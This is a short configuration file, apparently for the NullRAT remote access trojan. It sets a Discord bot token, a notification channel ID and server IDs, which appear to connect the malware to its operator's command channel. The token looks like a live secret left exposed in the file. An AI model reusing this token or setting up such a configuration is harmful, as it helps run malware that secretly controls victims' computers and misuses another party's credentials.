# This file was auto-generated by NullRAT Variables. DO NOT SHARE 
bot_token = "ODk4NDA5MzA0NzMyODg1MDEy.GhznYK.gUOjD___LbCivsXFu3AgZwBpOUulIYbK0Q3hcw" 
notification_channel = 959480539335766036 
server_ids = [775053090452668478] 
